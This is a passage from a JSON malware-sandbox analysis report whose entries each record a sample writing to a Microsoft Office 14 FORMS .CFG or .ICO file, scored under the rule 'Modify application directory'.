Office\\Office14\\FORMS\\1033\\OMSSMS.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25233", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25240", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25247", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25254", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25261", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25275", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25282", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25296", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25303", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25310", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25317", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25324", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25331", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25338", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25345", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25352", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\repltmpl.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25359", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25366", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25373", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESEND.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25380", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\resend.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25387", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25394", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25401", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25408", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEMS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25415", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitems.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25422", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25429", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25436", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreql.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDREQS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25443", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdreqs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25450", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresnl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESNS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25457", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresns.ico\".", 